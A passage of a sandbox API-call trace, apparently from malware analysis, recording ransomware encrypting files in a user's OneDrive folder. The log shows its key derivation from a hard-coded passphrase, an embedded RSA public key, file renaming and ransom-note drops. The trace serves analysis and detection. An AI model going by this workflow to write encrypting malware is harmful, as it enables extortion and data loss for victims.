hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.858] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.858] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.858] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.858] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.858] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.858] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.858] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.858] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.858] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.858] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.859] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.859] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.859] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.859] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.859] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.859] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.859] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.859] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.859] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.859] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.859] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.859] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.859] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.860] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.860] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.860] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.860] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.860] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.860] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.860] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.860] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0270.860] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0270.860] ReadFile (in: hFile=0x5d4c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x2c0, lpOverlapped=0x0) returned 1 [0270.860] CryptEncrypt (in: hKey=0x2fa208, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x2c0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x2d0) returned 1 [0270.860] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x2d0, lpOverlapped=0x0) returned 1 [0270.860] CloseHandle (hObject=0x5d4c) returned 1 [0270.860] CloseHandle (hObject=0x5d48) returned 1 [0270.861] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\it\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\it\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\it\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\it\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0270.866] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\it\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0270.866] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\it\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\it\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0270.868] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\it\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\it\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\it\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\it\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0270.870] CryptDestroyHash (hHash=0x2fa1c8) returned 1 [0270.870] CryptDestroyKey (hKey=0x2fa208) returned 1 [0270.870] CryptReleaseContext (hProv=0x2f26e68, dwFlags=0x0) returned 1 [0270.870] FindNextFileA (in: hFindFile=0x2fa948, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0270.870] FindClose (in: hFindFile=0x2fa948 | out: hFindFile=0x2fa948) returned 1 [0270.870] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\it\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\it\\readme_back_files.htm")) returned 0xffffffff [0270.870] AreFileApisANSI () returned 1 [0270.870] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889890, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0270.870] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\it\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\it\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0270.871] GetFileType (hFile=0x5d3c) returned 0x1 [0270.871] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0270.872] FindNextFileA (in: hFindFile=0x2fa788, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0270.872] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ja\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa348 [0270.873] FindNextFileA (in: hFindFile=0x2fa348, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0270.873] FindNextFileA (in: hFindFile=0x2fa348, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0270.873] FindClose (in: hFindFile=0x2fa348 | out: hFindFile=0x2fa348) returned 1 [0270.873] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ja\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\ja\\readme_back_files.htm")) returned 0xffffffff [0270.873] AreFileApisANSI () returned 1 [0270.873] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28892e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0270.873] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\ja\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\ja\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0270.874] GetFileType (hFile=0x5d3c) returned 0x1 [0270.874] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0270.876] FindNextFileA (in: hFindFile=0x2fa788, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0 [0270.876] FindClose (in: hFindFile=0x2fa788 | out: hFindFile=0x2fa788) returned 1 [0270.876] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\readme_back_files.htm")) returned 0xffffffff [0270.876] AreFileApisANSI () returned 1 [0270.876] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28896f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 93 [0270.876] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e474, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d44 [0270.877] GetFileType (hFile=0x5d44) returned 0x1 [0270.877] WriteFile (in: hFile=0x5d44, lpBuffer=0x2b9d0c0*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9d0b8, lpOverlapped=0x0 | out: lpBuffer=0x2b9d0c0*, lpNumberOfBytesWritten=0x2b9d0b8*=0x5ec, lpOverlapped=0x0) returned 1 [0270.879] FindNextFileA (in: hFindFile=0x2fa7c8, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0270.879] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\*.*", lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 0x2fa488 [0270.891] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0270.892] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0270.892] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0270.892] GetLastError () returned 0x0 [0270.892] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayLogo.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\autoplaylogo.png")) returned 0x20 [0270.893] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayLogo.png", dwFileAttributes=0x80) returned 1 [0270.893] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayLogo.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\autoplaylogo.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0270.894] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayLogo.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_1\\autoplaylogo.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0270.896] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_1\\AutoPlayLogo.png.gsg", dwFileAttributes=0x2) returned 1 [0270.897] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2f24b58) returned 1 [0270.899] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0270.899] lstrlenA (lpString="gRZNKRGLTXaVulDshFSSTuldzMlQm") returned 29 [0270.899] CryptHashData (hHash=0x2fa2c8, pbData=0x28cb3c8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0270.899] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa2c8, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2fa4c8) returned 1 [0270.899] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0270.899] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0270.899] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2f269a0) returned 1 [0270.900] CryptImportPublicKeyInfo (in: hCryptProv=0x2f269a0, dwCertEncodingType=0x1, pInfo=0x2f325d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f32600*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f32608*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2fa508) returned 1 [0270.900] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0270.900] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f26b38*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f26b38*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0270.900] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f26b38*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f26b38*, lpNumberOfBytesWritten=0x2b9d204*=0x80, lpOverlapped=0x0) returned 1 [0270.901] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.912] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.914] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.916] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.917] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.917] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.917] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.917] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.917] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.917] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.917] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.917] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.918] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.918] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0270.918] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0270.918] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0xbc, lpOverlapped=0x0) returned 1 [0270.918] CryptEncrypt (in: hKey=0x2fa4c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0xbc, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0xc0) returned 1 [0270.918] WriteFile (in: 